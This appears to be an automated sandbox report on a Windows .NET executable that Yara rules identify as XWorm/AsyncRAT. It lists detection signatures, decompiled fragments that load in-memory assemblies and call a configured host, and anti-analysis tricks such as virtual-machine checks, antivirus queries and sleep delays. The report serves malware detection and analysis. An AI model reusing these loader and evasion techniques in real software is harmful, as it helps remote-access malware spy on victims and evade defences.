            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
            Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeCode function: 0_2_00007FF887D368E60_2_00007FF887D368E6
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeCode function: 0_2_00007FF887D376920_2_00007FF887D37692
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeCode function: 0_2_00007FF887D32A000_2_00007FF887D32A00
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000000.1323730382.00000000003DC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilename08.exe4 vs 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeBinary or memory string: OriginalFilename08.exe4 vs 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@0/1
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMutant created: NULL
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMutant created: \Sessions\1\BaseNamedObjects\CCQxcQjeOUw0cNMQ
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeReversingLabs: Detection: 84%
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMemory allocated: 1A6A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeWindow / User API: threadDelayed 9543Jump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe TID: 7916Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe TID: 7920Thread sleep count: 9543 > 30Jump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe TID: 7920Thread sleep count: 309 > 30Jump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3784605807.000000001B6B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Found potential dummy code loops (likely to delay analysis)
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess Stats: CPU usage > 42% for more than 60s
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeProcess token adjusted: DebugJump to behavior
            Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeQueries volume information: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3784605807.000000001B6EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe PID: 7776, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected XWorm
            Source: Yara matchFile source: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, type: SAMPLE
            Source: Yara matchFile source: 0.0.17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe.3d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000000.1323714120.00000000003D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe PID: 7776, type: MEMORYSTR

            Mitre Att&ck Matrix

